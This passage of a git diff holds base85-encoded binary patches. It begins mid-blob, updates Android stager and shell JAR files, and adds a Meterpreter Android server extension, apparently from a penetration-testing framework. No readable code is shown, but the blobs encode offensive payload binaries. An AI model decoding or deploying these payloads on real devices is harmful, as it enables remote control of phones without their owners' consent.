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
R1cDx@8yE!g%K6{ue*owvxLN=J

diff --git a/data/android/metstage.jar b/data/android/metstage.jar
index 6803307a5fc7692eafa92b2700a0112b04a34f21..65fe7a7cf271b2e3cc81268cf3e6592bb0320211 100644
GIT binary patch
delta 89
zcmdnZx0{bQz?+#xgn<JH6;xkL<jqi#{#f*}h>;<{o1NpoPRT7d1_lNXAVyKQai$m>
VH$;mINYUh7Y}RZL{^Z|m4glFL7efF5

delta 89
zcmdnZx0{bQz?+#xgn@&DgJHW*<wV{LmFN#eABz|n0=(Hd;!KWAaARO#@Bm^IbsJ}j
Xv2jDRxPTN*-o<9k2H{Ws&E^0A@hBI#

diff --git a/data/android/shell.jar b/data/android/shell.jar
index 5fd680fa8fa49e10c219683a66d4b0d4b38a629e..13cfe6cecf81e175434e2d0786416ed3aea24c11 100644
GIT binary patch
delta 89
zcmdnXx0jDMz?+#xgn<JH6;xkL<jqi#{#f*}h>;<{o1NpoPRT7d1_lNXAVyKQai#<t
VH$;mINYUgyY}RZL{^Y-G4glKe7fk>F

delta 89
zcmdnXx0jDMz?+#xgn@&DgJGLb<wV{LmFN#eABz|n0=(Hd;!KWAaARO#@Bm_jy6rxd
c8)r(eaYMAYfD}#M!)DC}<O8K9|7CLk0P=$uzyJUM

diff --git a/data/meterpreter/ext_server_android.jar b/data/meterpreter/ext_server_android.jar
new file mode 100644
index 0000000000000000000000000000000000000000..b6a01cac095c0f8e799987555ea70dea3ae1b18e
GIT binary patch
literal 38782
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
